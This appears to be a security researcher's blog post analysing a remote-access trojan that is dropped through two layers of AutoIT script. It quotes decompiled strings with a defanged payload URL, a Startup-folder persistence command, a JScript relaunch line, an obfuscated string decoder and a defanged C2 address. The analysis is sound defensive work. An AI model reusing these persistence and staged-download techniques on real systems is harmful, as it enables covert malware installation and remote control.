My next class:

RAT Dropped By Two Layers of AutoIT Code

Published: 2025-05-19. Last Updated: 2025-05-19 05:37:10 UTC
by Xavier Mertens (Version: 1)
0 comment(s)

Like .Net, AutoIT[1] remains a popular language for years in the malware ecosystem. It's a simple language that can interact with all the components of the Windows operating system. I regularly discover AutoIT3 binaries (yes, it can be compiled). This weekend, I found a malware delivered through a double layer of AutoIT code!

The initial file is an executable called "1. Project & Profit.exe" (SHA256:b5fbae9376db12a3fcbc99e83ccad97c87fb9e23370152d1452768a3676f5aeb). This is an AutoIT compiled script. Once decompiled, the code is simple and contains interesting strings:

Global $VY9A = "hxxps://xcvbsfq32e42313[.]xyz/OLpixJTrO"
Global $ZX2B = "C:\Users\Public\Guard.exe"
Global $FW3N = "C:\Users\Public\PublicProfile.ps1"
$fU5L = ""hxxps://xcvbsfq32e42313[.]xyz/hYlXpuF.txt"""
$oF6L = ""C:\Users\Public\Secure.au3

It's behaviour is simple: It will generate the PublicProfile.ps1 and execute it.

An AutoIT interpreter will be downloaded (and saved as "C:\Users\Public\Guard.exe") as well as another piece of AutoIT script (the second layer)

Persistence is achieved via a simple .url file placed in the Startup directory:

cmd /k echo [InternetShortcut] > "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit

The JavaScript script will re-execute the AutoIT interpreter ("SwiftWrite.pif") with its second script ("G"):

new ActiveXObject("Wscript.Shell").Run("\"C:\\Users\\REM\\AppData\\Local\\WordGenius Technologies\\SwiftWrite.pif\" \"C:\\Users\\REM\\AppData\\Local\\WordGenius Technologies\\G\"")

Let's have a look at "G", the second layer of AutoIT code. This script is pretty well obfuscated. All strings are encoded using the Wales() function. Example:

If (Execute(Wales("80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]116]117]105]46]101]120]101]39]41",0/2))) ...

The Wales function is simple, here is a Python version to help to decode all strings:

remnux@remnux:/MalwareZoo/20250518$ python3
Python 3.8.10 (default, Jun 22 2022, 20:18:18) 
[GCC 9.4.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> def Wales(encoded: str, key: int) -> str:
...     parts = [p for p in encoded.split("]") if p]
...     decoded = ''.join(chr(int(num) - key) for num in parts)
...     return decoded
... 
>>> Wales("80]114]111]99]101]115]115]69]120]105]115]116]115]40]39]97]118]97]115]116]117]105]46]101]120]101]39]41",0)
"ProcessExists('avastui.exe')"

Finally, a "jsc.exe" process is spanwed and injected with the final malware as a DLL: Urshqbgpm.dll

I'm not sure about the final malware because it tried to connect to the C2 server 139[.]99[.]188[.]124 on port 56001. This one is associated to AsyncRAT.

But, in the DLL, we can find a lot of references to PureHVNC[2]:

[1] https://www.autoitscript.com/site/
[2] https://cyble.com/blog/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

Keywords: AutoIT Injection PowerShell RAT Script
0 comment(s)
My next class:

Comments

Login here to join the discussion.


Top of page
Diary Archives